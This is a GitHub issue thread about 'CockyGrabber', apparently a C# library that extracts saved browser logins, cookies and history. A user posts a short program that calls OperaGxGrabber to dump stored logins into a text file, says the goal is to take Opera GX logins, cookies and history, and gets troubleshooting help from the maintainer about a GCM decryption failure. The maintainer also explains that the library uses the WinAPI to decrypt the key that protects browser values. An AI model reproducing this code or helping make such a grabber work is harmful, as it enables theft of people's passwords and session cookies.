Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

mac check in GCM failed #25

Closed
zxcvgx opened this issue Apr 20, 2022 · 19 comments
Closed

mac check in GCM failed #25

zxcvgx opened this issue Apr 20, 2022 · 19 comments
Labels
bug Something isn't working help wanted Extra attention is needed

Comments

@zxcvgx
Copy link

zxcvgx commented Apr 20, 2022

This is the error or issue the occurs when i try the statements
"the error is within the attachment"
error output.txt

And this is the program it self

using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using CockyGrabber.Grabbers;
using CockyGrabber;
using System.IO;

namespace Test_Ground
{
    internal class Program
    {
        private const string LogFilePath = "AAA.txt";
        static void Main(string[] args)
        {
            Console.Title = "Test Ground - Console Apllication";
            Console.Write("Starting Ground Work");
            Console.WriteLine("");


           // UniversalGrabber g = new UniversalGrabber(); // Create Grabber
            OperaGxGrabber g = new OperaGxGrabber();

            

            File.AppendAllText(LogFilePath, g.GetLogins().ToString()); // Append the grabbed Logins to the log file
            Console.ReadKey();

        }
    }
}

@zxcvgx
Copy link
Author

zxcvgx commented Apr 20, 2022

And yes i installed the nugget packages

@MoistCoder MoistCoder added bug Something isn't working help wanted Extra attention is needed labels Apr 20, 2022
@MoistCoder
Copy link
Owner

Are you using the latest version? Is your project 86x (32bit) or 64x?

@zxcvgx
Copy link
Author

zxcvgx commented Apr 20, 2022

Yes

@zxcvgx
Copy link
Author

zxcvgx commented Apr 20, 2022

i tried reinstalling and trying Projects to projects

@MoistCoder
Copy link
Owner

Is the problem only in OperaGxGrabber or other grabbers too?
Have you tried to make it work on other systems and if not can you try?

@zxcvgx
Copy link
Author

zxcvgx commented Apr 21, 2022

i tried it on OperaGx but as it shows fails with the error but with the other not sure i dont have them installed in the mean time

@MoistCoder
Copy link
Owner

Are you sure you don't have edge installed? It's usually preinstalled on windows 10. What OS are you using as as I asked: Can you test it on an other system like a virtual Maschine?

@zxcvgx
Copy link
Author

zxcvgx commented Apr 21, 2022

I got edge installed, Windows 11 Workstations, Same error

@zxcvgx
Copy link
Author

zxcvgx commented Apr 21, 2022

im gonna try older .net framework versions ill update you later on

@zxcvgx
Copy link
Author

zxcvgx commented Apr 21, 2022

the chrome cookie grabber works but on opera gx same error

@zxcvgx
Copy link
Author

zxcvgx commented Apr 21, 2022

my main goal is to get OperaGx login and Cookies and History
can you make a explanitory event that does the specific command?

@MoistCoder
Copy link
Owner

MoistCoder commented Apr 21, 2022

I didn't test it on Windows 11 so I don't know if it doesn't work on it. Can you test it on win 10? Maybe with a Virtual machine?

@zxcvgx
Copy link
Author

zxcvgx commented Apr 22, 2022

hmm i see, let me check it

@zxcvgx
Copy link
Author

zxcvgx commented Apr 22, 2022

but anyways what does the OS environment affect the decryption key?
tested on windows 10 same error

@zxcvgx
Copy link
Author

zxcvgx commented Apr 22, 2022

Could it be that OperaGx took notice of the grabber?

@zxcvgx
Copy link
Author

zxcvgx commented Apr 22, 2022

also did it work for you? in the windows 10

@zxcvgx
Copy link
Author

zxcvgx commented Apr 22, 2022

cause if that's the prob then it might be because the unsupported version
if that's case you should add it to the todo list

@MoistCoder
Copy link
Owner

MoistCoder commented Apr 22, 2022

Hmm. Idk if win11 encrypts values differently. CockyGrabber uses the WinAPI so It decrypts values based the API of windows. (I mean it uses the WinAPI to decrypt the key which is used to decrypt blink values like cookies.)

However: I tested the OperaGxGrabber and it works for me. I can later test it on a virtual machine with win 11 and see for myself.

But maybe it's because of Opera itself as you say. What version do you use?

@MoistCoder
Copy link
Owner

It seems like it's a local problem. I tested it on win11 on a VM and it works. The same goes for my current PC which is win10.
I will close this issue for now but if there are more problems like this I will reopen it.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
bug Something isn't working help wanted Extra attention is needed
Projects
None yet
Development

No branches or pull requests

2 participants